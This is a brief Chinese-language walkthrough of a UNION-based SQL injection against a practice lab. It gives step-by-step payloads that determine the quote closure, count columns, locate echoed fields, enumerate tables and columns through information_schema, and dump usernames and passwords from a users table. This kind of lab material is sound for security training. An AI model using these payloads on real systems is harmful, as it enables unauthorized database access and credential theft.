1、判断类型的注入
?id=1(正常回显)
?id=1'(正常回显)
?id=1"(报错)
可判断为字符型闭合,")为闭合方式
2、查询列数,判断回显位置
?id=1") order by 3 --+
?id=1") order by 4 --+
判断出有3列
?id=1") and 1=2 union select 1,2,3 --+
2,3位置有回显
3、查询数据库名(库名为security)
?id=1") and 1=2 union select 1,database(),3 --+
4、查询表名(有4张表,我们查询users这张表)
?id=1") and 1=2 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database(); --+
5、查询users表中字段
?id=1") and 1=2 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'; --+
6、查询用户名和密码字段的值 ,用id分隔开方便观看
?id=1") and 1=2 union select 1,database(),group_concat(username,id,password) from security.users --+
